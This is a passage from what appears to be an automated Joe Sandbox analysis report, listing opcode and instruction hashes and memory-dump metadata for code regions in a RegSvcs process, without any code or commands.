                                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction Fuzzy Hash: 6FE0AE743442058BE715CF19C040B667BA6BFE5A10F6DC069A9488F305EB72A8429A40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e862fcc806b594130e59b570a1abbf47101588b3cbe57948d2ff34293bf958d
                                                                        • Instruction ID: 232aa4ced6d536d8221feed9d9d6aade5cfc163bf06be646800e524668cd78d4
                                                                        • Opcode Fuzzy Hash: 7e862fcc806b594130e59b570a1abbf47101588b3cbe57948d2ff34293bf958d
                                                                        • Instruction Fuzzy Hash: BCD02B328811306ACFB6E3197C44FE33E5DAB64220F024873F90897032D574CC81D2D4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction ID: 56147e6438947ce3fce7406208854882562ffe5692b41aca5ca49b79ef400131
                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction Fuzzy Hash: 0FE0CD31500512EFD7332F16DC00F9276A5FF64F14F10481FE0411507887B45C82CB45
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fd65a07ce24a6873c541d3bc373c84e828ff0106dc165ffb08e16b14036ed52c
                                                                        • Instruction ID: 8f12afb9f7dd71e6442bb69fe4c24c3072ff1d4683de0b5e60707e0a05c9790a
                                                                        • Opcode Fuzzy Hash: fd65a07ce24a6873c541d3bc373c84e828ff0106dc165ffb08e16b14036ed52c
                                                                        • Instruction Fuzzy Hash: 22E0C2332004606BC322FF6EDD00F4A739EEFB4270F45022AF1558B2A0CAB4AC40C794
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction ID: f424488b6328f9659bcf2ad13f580b71655f212126e3df922fba66295f6812df
                                                                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction Fuzzy Hash: 5BE08633111A1487C728DE18D511B7277A4EF85720F09463EAA5347791C934E944C794
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                        • Instruction ID: 4aa61b3e612a3450bcc429b35ce0cadf7db3092db93d5b37605b138cb72a37c2
                                                                        • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                        • Instruction Fuzzy Hash: 09D05E36511A50AFD3329F1BEA00C53BBF9FBD9A20706062FA54583A20C670AC06CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction ID: 9f8d1217b22d9e481da9f5fb1d207726a3bc9fca9a52a75a9f8e30e51e2beba2
                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction Fuzzy Hash: 58D0A933204620ABDB32AA1DFC00FC333E8BB9C720F06089EB008C7160C374AC81CA84
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction ID: 84ce0fadfff6a1368e4aa13dc223ab135f7b6242293111e8ec7622137dcd0e53
                                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction Fuzzy Hash: 2AE0EC369506849BDF12DF5AC640F5ABBB5BB94B40F150059E1486B771C634A900CB40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction ID: 77c9f615573fb04996573f18dbcc86e41979947781530e45285648dc0c91f35d
                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                        • Instruction Fuzzy Hash: B7D022332130B093CB285A566900F636D05ABC0AA0F2A002E340A93924C0288C43C2E0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                        • Instruction ID: c081683a56f5977fd3f303e17543c0610ba5fa97f882ea38358d201d17289ea1
                                                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                        • Instruction Fuzzy Hash: ADD012371D054DBBCB119F66DC01F957BA9E7A4BA0F444021B504875A0C63AE950D584
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5ab0e0475f2d3244c8a376ac3e0e2b359cfbf3d0af3a505836f2c1c8af2b7b21
                                                                        • Instruction ID: bc2f864c5f5f68b8f61959a779c12a64b4d2e844be32ea9efec8f77041d42642
                                                                        • Opcode Fuzzy Hash: 5ab0e0475f2d3244c8a376ac3e0e2b359cfbf3d0af3a505836f2c1c8af2b7b21
                                                                        • Instruction Fuzzy Hash: 30D05E315011168BDF16CF09C550E2A3E74EF24A41B40007EEA0151131E338EC018640
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction ID: f071a15fc289585a890c766d60fac35107779a074ff121d55620e34128f1d3f5
                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction Fuzzy Hash: F6D0C935212E80CFD61BCB0CC5A4F1633A8BB88B44F850591F401CBB32D67CDD40CA00
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction ID: fe13125b6d153defbdeefedff4a074c1e6729eee6199258d04a9b102a861bede
                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                        • Instruction Fuzzy Hash: 69C01233290648AFC712AE9ACD01F027BA9EBA8B50F000022F2048B670C635E820EA84
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction ID: 2c3ae73593acde9cc35406a8f7a04fa278982bd79f2a1cedea0875d21b264bc9
                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                        • Instruction Fuzzy Hash: 73D01236100248EFCB01DF41C890D9A7B2AFBD8710F108019FD19076108A31ED62DA50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction ID: e0477905d6e52c1aa94fc3b6b8e223d084b5738ac60d12bb1ae8eb57dc19c0c0
                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction Fuzzy Hash: A3C002796015418FDF15DA1AD294A4577E4B754750F150891E805DB722E624E801CA10
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 040a0d4dd73e73c8c7971f4a1264a97727c41b497dc695be92398812176d96b0
                                                                        • Instruction ID: 52b205ebd11f89386961aacf365dcf924986073274ddd6601f57e45eeb8eccc4
                                                                        • Opcode Fuzzy Hash: 040a0d4dd73e73c8c7971f4a1264a97727c41b497dc695be92398812176d96b0
                                                                        • Instruction Fuzzy Hash: ED900231605801129140715848885864005A7F0301B55C022E0424555CCB248A5A5361
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c18e20a677e162759978c5ab9fb6f7ffbb7a0e3d148e31e36b6bf788f128cee8
                                                                        • Instruction ID: 06e743cedf042dac2a4b5a5e5c6695699c5979c19469a553ae243186dd49c09b
                                                                        • Opcode Fuzzy Hash: c18e20a677e162759978c5ab9fb6f7ffbb7a0e3d148e31e36b6bf788f128cee8
                                                                        • Instruction Fuzzy Hash: C1900271601501424140715848084466005A7F1301395C126A0554561CC72889599369
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 254f7c2a89565ef1d9373f7d93ac454abbb2d6f3c597dc2665d5310aa57053c1
                                                                        • Instruction ID: 4d3de7ca7200f85a650daa0460bcc41c7c5446741fc9d663c17eafb44345b3b1
                                                                        • Opcode Fuzzy Hash: 254f7c2a89565ef1d9373f7d93ac454abbb2d6f3c597dc2665d5310aa57053c1
                                                                        • Instruction Fuzzy Hash: 1990023120544942D14071584408A86001597E0305F55C022A0064695DD7358E59B761
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9df14d8f7ee7c7a93a41717f43cc0aefdcbc74f299e7909a40f9335f0f1b5c1c
                                                                        • Instruction ID: bb936e50812fa9d6264e0d3fb36b9cd93727e1b2bc05154eed0d12c5457f2cdf
                                                                        • Opcode Fuzzy Hash: 9df14d8f7ee7c7a93a41717f43cc0aefdcbc74f299e7909a40f9335f0f1b5c1c
                                                                        • Instruction Fuzzy Hash: E090023120140902D1807158440868A000597E1301F95C026A0025655DCB258B5D77A1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 89d788db3b692ef0ac6e327353ea865406eb48f02414b5cb41499d5d926f42d5
                                                                        • Instruction ID: 434a69248475e54255d86d5c42f77080bae30d703640acbde8b78e81722e0332
                                                                        • Opcode Fuzzy Hash: 89d788db3b692ef0ac6e327353ea865406eb48f02414b5cb41499d5d926f42d5
                                                                        • Instruction Fuzzy Hash: 9790023120140902D104715848086C6000597E0301F55C022A6024656ED77589957231
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e211244ad8caece836d7fdbf5ede2e58bf43d8ab990232e6b5a1a5d9abe32f7e
                                                                        • Instruction ID: 631833c40db3b0ae91049a6f1289fcaad13ffa8e3f0dd1aa6d9de4d54684344d
                                                                        • Opcode Fuzzy Hash: e211244ad8caece836d7fdbf5ede2e58bf43d8ab990232e6b5a1a5d9abe32f7e
                                                                        • Instruction Fuzzy Hash: F590023160540902D15071584418786000597E0301F55C022A0024655DC7658B5977A1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fac0cd0c9f03295053a0313d8db86f19bd20328e98dc1f106da3dc3581067614
                                                                        • Instruction ID: 6a5a002db1f9ea2b37538e671c9fcf5639ba1c7a3eda1b0d252ddaacb43bed6c
                                                                        • Opcode Fuzzy Hash: fac0cd0c9f03295053a0313d8db86f19bd20328e98dc1f106da3dc3581067614
                                                                        • Instruction Fuzzy Hash: 2B900435311401030105F55C070C5470047D7F5351355C033F1015551CD731CD755331
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 916d78f5dc674f69059b2e9b1ab32de285fceac8bf0ba78746484486e0a6bbb9
                                                                        • Instruction ID: 96255e2ca9b62e8899c504d25181383d5f72181a66aac977c68347fd512a8c63
                                                                        • Opcode Fuzzy Hash: 916d78f5dc674f69059b2e9b1ab32de285fceac8bf0ba78746484486e0a6bbb9
                                                                        • Instruction Fuzzy Hash: 50900235221401020145B558060854B0445A7E6351395C026F1416591CC73189695321
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f96a57a5f7baba142e72bf06feba5a7e462270d0f956aab58f8699f157285149
                                                                        • Instruction ID: e7e8a232e012eb406bb98de1aded184be4bd239ed4d5f4cccfb52568072ec195
                                                                        • Opcode Fuzzy Hash: f96a57a5f7baba142e72bf06feba5a7e462270d0f956aab58f8699f157285149
                                                                        • Instruction Fuzzy Hash: 5C9002B1201541924500B2588408B4A450597F0201B55C027E1054561CC63589559235
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1462c2d9bdfdb5b2d9439102b68fbad43603a7ef6fea6297535e4e5fa0224977
                                                                        • Instruction ID: d26aa4e3547ac3f4adc82393687b59646d3b757d307e1e7bc7133ff13a51e510
                                                                        • Opcode Fuzzy Hash: 1462c2d9bdfdb5b2d9439102b68fbad43603a7ef6fea6297535e4e5fa0224977
                                                                        • Instruction Fuzzy Hash: D290023120544542D1007558540CA46000597E0205F55D022A1064596DC7358955A231
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb179e336c2b8b6435f95370b9ad0840f6087c2b99039dc84dc96d9c6850a46d
                                                                        • Instruction ID: c77d63a222b0355584544841be36841804ba66324a8f438537d3d08e268e7a7a
                                                                        • Opcode Fuzzy Hash: fb179e336c2b8b6435f95370b9ad0840f6087c2b99039dc84dc96d9c6850a46d
                                                                        • Instruction Fuzzy Hash: 9C90023921340102D1807158540C64A000597E1202F95D426A0015559CCA25896D5321
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52d610a5c8363f83267743ab4c6c70dec89acc4a4fc8acc640757f7dffd48735
                                                                        • Instruction ID: 6966389b3c9ce4382a3a4a855ea4b4c655268f7823df37997b9f8d02a5df4981
                                                                        • Opcode Fuzzy Hash: 52d610a5c8363f83267743ab4c6c70dec89acc4a4fc8acc640757f7dffd48735
                                                                        • Instruction Fuzzy Hash: 6590023130140103D1407158541C6464005E7F1301F55D022E0414555CDA25895A5322
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21733a6ab0a9cce02a5fde14227154e1a8472a4949cec961093e47671cb67409
                                                                        • Instruction ID: 0932c6f1ed72174e7f8fbedd96c94d6617617c699926999eaca792e17c997e83
                                                                        • Opcode Fuzzy Hash: 21733a6ab0a9cce02a5fde14227154e1a8472a4949cec961093e47671cb67409
                                                                        • Instruction Fuzzy Hash: 58900231242442525545B15844085474006A7F0241795C023A1414951CC636995AD721
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5537d9624734dd658dd92589d03cca259edcb2291876d058b561ba494a5c9873
                                                                        • Instruction ID: 78deb22a6ce5cba29ff133b1dbc0ac6846a7512d7b28c07ad7dddcb66eccc7ca
                                                                        • Opcode Fuzzy Hash: 5537d9624734dd658dd92589d03cca259edcb2291876d058b561ba494a5c9873
                                                                        • Instruction Fuzzy Hash: 7690023124140502D141715844086460009A7E0241F95C023A0424555EC7658B5AAB61
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 14df7e22f1fbe136e0ff03112fbb2eeb9336662b628ee1dd44049bab29cb3d87
                                                                        • Instruction ID: 4920b96c2789e7901ec9254bd64441c52b106e470553b12439ea667f36a2dcab
                                                                        • Opcode Fuzzy Hash: 14df7e22f1fbe136e0ff03112fbb2eeb9336662b628ee1dd44049bab29cb3d87
                                                                        • Instruction Fuzzy Hash: CC90023120140942D10071584408B86000597F0301F55C027A0124655DC725C9557621
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cbb9245645a2576a1201ee8146e7ce8fd45c2667ea635e592c3f530a4d151d12
                                                                        • Instruction ID: acaf2161ed57cdf2bc7b2ec8b0244643fbc3a60ac92ca50d2ad245b746c077cb
                                                                        • Opcode Fuzzy Hash: cbb9245645a2576a1201ee8146e7ce8fd45c2667ea635e592c3f530a4d151d12
                                                                        • Instruction Fuzzy Hash: 3E90023160540502D1407158541C746001597E0201F55D022A0024555DC7698B5967A1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06c1d0a6dd2ed867323e9bc605c5fb88cb3d8e98e88e48c2cb377c9374bc8a53
                                                                        • Instruction ID: 9491d001565c888468da7bde9f2d8e872dc43a9993390f56d50d36162bd6e25d
                                                                        • Opcode Fuzzy Hash: 06c1d0a6dd2ed867323e9bc605c5fb88cb3d8e98e88e48c2cb377c9374bc8a53
                                                                        • Instruction Fuzzy Hash: 0390023120140503D1007158550C747000597E0201F55D422A0424559DD76689556221
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c4bac59d0bb963c648b6bb63b86f119aff0cef861cce3af8f5f83d16f27c820
                                                                        • Instruction ID: 9553893a6a9a02cb9aa2d241f3890fcff86eadad9a3461e42d6c7bc1bfad2207
                                                                        • Opcode Fuzzy Hash: 3c4bac59d0bb963c648b6bb63b86f119aff0cef861cce3af8f5f83d16f27c820
                                                                        • Instruction Fuzzy Hash: 2C90023120140502D1007598540C686000597F0301F55D022A5024556EC77589956231
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c2f4b8ac6c3b746fba1b748ff387fbd91e903c7666452077be2c2701842927a5
                                                                        • Instruction ID: 8cc29bd06c0737edd7b4a4057d08af5de599310136136a66cd31447f2057083c
                                                                        • Opcode Fuzzy Hash: c2f4b8ac6c3b746fba1b748ff387fbd91e903c7666452077be2c2701842927a5
                                                                        • Instruction Fuzzy Hash: 2990047131140143D104715C440C7470045D7F1301F55C033F3154555CC73DCD755335
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 49984eafbf5c72b5219fb244ade7e87af0fa7c35073028d95bcf471791795d8c
                                                                        • Instruction ID: 3d726ebcb499723a46d17dcd1f3977c4e98b564b8d243871666ead5546f37b6a
                                                                        • Opcode Fuzzy Hash: 49984eafbf5c72b5219fb244ade7e87af0fa7c35073028d95bcf471791795d8c
                                                                        • Instruction Fuzzy Hash: 8B90027134140542D10071584418B460005D7F1301F55C026E1064555DC729CD566226
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eec076077bbd9f8e1b628fb433604c1d384e34f14e706d121596323116f8ab4e
                                                                        • Instruction ID: 37da1dde41591d82b3d8daaf542998c65ae0ff088b5b88be0db8b8d4d2269a28
                                                                        • Opcode Fuzzy Hash: eec076077bbd9f8e1b628fb433604c1d384e34f14e706d121596323116f8ab4e
